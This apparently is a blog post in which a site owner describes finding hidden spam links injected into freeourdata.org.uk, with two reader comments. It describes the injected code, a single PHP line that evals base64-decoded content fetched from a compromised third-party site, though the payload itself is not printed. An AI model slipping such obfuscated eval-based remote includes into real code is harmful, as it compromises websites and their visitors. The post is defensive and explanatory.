The hacker leaves more footprints… but how many sites have this problem?

Another day, another little hack on freeourdata.org.uk’s front page – once more adding spam links to it in invisibie links (using the stylesheet command div style="display:none").

What’s interesting this time though is that the person doing it has decided to be a bit more subtle. Rather than doing it all by hand, he’s clearly decided that automation is the thing.

And so the inserted spam-generating code is just one line of PHP. One line!

Ah, but it’s clever – it’s a base64_decode (ie, a string of encoded stuff) which is then enclosed in an eval() statement.

So PHP decodes the base_64 stuff and then does what it’s told by that statement.

And what it’s told to evaluate is to get the content of a URL: http://weberneedle.com/pictures/header/h/freeourdata.org.uk.html.

Weberneedle, in case you’re wondering, is part of Weber Medical. Obviously, it’s been hacked.

The spam is pointing to two directories – http://sportsnation.espn.go.com/fans/Thomas9385 and http://www.anats.org.au/statechapters/act/images/online/canadian/. They’ve been hacked too. (Oh, Anats – the Australian National Association of Teachers of Singing. You’re offering links to a lot more than singing, I’m afraid.)

But it would be interesting to know how many more sites weberneedle’s hacked directory is pointing to.

And the bigger question is: how many sites out there have been hacked? In the course of my experiences alone I’ve come across half a dozen. (And I’m still trying to locate and close the hole in our server that makes this possible, of course. It’s annoying, but not disastrously so.) How many millions (and yes, I mean millions) of sites are there out there which have been exploited in this way, and which are therefore pointing to stuff they never realised?

At some stage there’s going to have to be a massive clearup – but I can’t imagine it happening. You’d pretty much have to turn the web off and on again.

2 Comments

  1. I’m inclined to think that search engine crawlers could be adapted to look for stuff like this on the fly and raise the alert somehow, e.g. by email to abuse@domain.com

  2. Surely someone can write some software to scan the code of a site? Or am I being a bit thick.

Comments are closed.